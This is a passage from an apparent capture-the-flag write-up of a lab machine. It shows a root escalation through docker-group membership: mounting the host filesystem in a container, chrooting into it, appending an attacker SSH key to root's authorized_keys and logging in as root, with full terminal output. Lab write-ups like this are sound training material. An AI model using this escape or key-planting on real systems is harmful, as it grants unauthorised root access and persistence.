Docker Group
Being in the docker group has root-level access to the system
r00t@ultratech-prod:/home$ docker run -v /:/mnt --rm -it 495d6437fc1e chroot /mnt sh
# This command essentially creates a copy of the current system
whoami
root
# hostnam
# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.2 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:ac:11:00:02 txqueuelen 0 (Ethernet)
RX packets 11 bytes 906 (906.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0I’m inside the newly created Docker container
# ls -lasht
total 40K
4.0K -rw------- 1 root root 844 Mar 22 2019 .bash_history
4.0K drwx------ 6 root root 4.0K Mar 22 2019 .
4.0K -rw-rw-rw- 1 root root 193 Mar 22 2019 private.txt
4.0K drwx------ 3 root root 4.0K Mar 22 2019 .emacs.d
4.0K drwx------ 3 root root 4.0K Mar 22 2019 .gnupg
4.0K drwx------ 2 root root 4.0K Mar 22 2019 .cache
4.0K drwx------ 2 root root 4.0K Mar 22 2019 .ssh
0 -rw------- 1 root root 0 Mar 22 2019 .python_history
4.0K drwxr-xr-x 23 root root 4.0K Mar 19 2019 ..
4.0K -rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profileRoot directory
SSH Key Write
# echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali' >> /root/.ssh/authorized_keysWriting the public SSH key
┌──(kali㉿kali)-[~/archive/thm/ultratech]
└─$ ssh root@$IP -i ~/.ssh/id_ed25519
Enter passphrase for key '/home/kali/.ssh/id_ed25519':
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-46-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Jul 22 17:49:21 UTC 2024
System load: 0.0 Processes: 113
Usage of /: 24.4% of 19.56GB Users logged in: 1
Memory usage: 54% IP address for eth0: 10.10.57.71
Swap usage: 0% IP address for docker0: 172.17.0.1
1 package can be updated.
0 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Mar 22 18:19:40 2019
root@ultratech-prod:~# whoami
root
root@ultratech-prod:~# hostname
ultratech-prod
root@ultratech-prod:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000
link/ether 02:1c:21:b7:f9:bf brd ff:ff:ff:ff:ff:ff
inet 10.10.57.71/16 brd 10.10.255.255 scope global dynamic eth0
valid_lft 3006sec preferred_lft 3006sec
inet6 fe80::1c:21ff:feb7:f9bf/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:92:e3:60:06 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:92ff:fee3:6006/64 scope link
valid_lft forever preferred_lft forever
7: veth4442501@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether 8e:b9:2d:56:5c:7c brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::8cb9:2dff:fe56:5c7c/64 scope link
valid_lft forever preferred_lft foreverSystem Level Compromise